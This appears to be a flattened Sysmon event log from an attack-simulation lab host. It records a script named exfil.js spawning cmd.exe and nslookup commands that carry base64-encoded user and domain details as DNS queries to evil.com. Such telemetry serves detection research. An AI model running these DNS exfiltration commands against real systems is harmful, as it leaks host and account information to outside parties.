14:16:07.884{2E1864BB-17A7-629A-E83D-000000005F02}27921736C:\Windows\system32\cmd.exe{2E1864BB-17A7-629A-EA3D-000000005F02}7380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.888{2E1864BB-17A7-629A-EA3D-000000005F02}7380C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A7-629A-E83D-000000005F02}2792C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcoadw.tmp 2>&1 10341000x8000000000000000194666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.868{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-E93D-000000005F02}2104C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.868{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-E93D-000000005F02}2104C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000194664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.270{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52133- 354300x8000000000000000194663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.270{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52132- 354300x8000000000000000194662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.269{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52131- 354300x8000000000000000194661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.516{00000000-0000-0000-0000-000000000000}5108<unknown process>-udptruefalse127.0.0.1-52118-false127.0.0.1-53domain 10341000x8000000000000000194660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.852{2E1864BB-17A7-629A-E93D-000000005F02}21042088C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-E83D-000000005F02}2792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.852{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-E93D-000000005F02}2104C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.837{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.837{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.837{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.837{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.837{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-E83D-000000005F02}2792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.837{2E1864BB-17A1-629A-783D-000000005F02}55526824C:\Windows\System32\WScript.exe{2E1864BB-17A7-629A-E83D-000000005F02}2792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.851{2E1864BB-17A7-629A-E83D-000000005F02}2792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcoadw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.837{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqjpwjm.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.821{2E1864BB-17A7-629A-E63D-000000005F02}30845968C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-E73D-000000005F02}408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.821{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.821{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.821{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.821{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-E73D-000000005F02}408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.821{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.821{2E1864BB-17A7-629A-E53D-000000005F02}74167900C:\Windows\system32\cmd.exe{2E1864BB-17A7-629A-E73D-000000005F02}408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.822{2E1864BB-17A7-629A-E73D-000000005F02}408C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A7-629A-E53D-000000005F02}7416C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqjpwjm.tmp 2>&1 10341000x8000000000000000194642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.806{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-E63D-000000005F02}3084C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.806{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-E63D-000000005F02}3084C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.784{2E1864BB-17A7-629A-E63D-000000005F02}30845968C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-E53D-000000005F02}7416C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.784{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-E63D-000000005F02}3084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.768{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.768{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.768{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.768{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 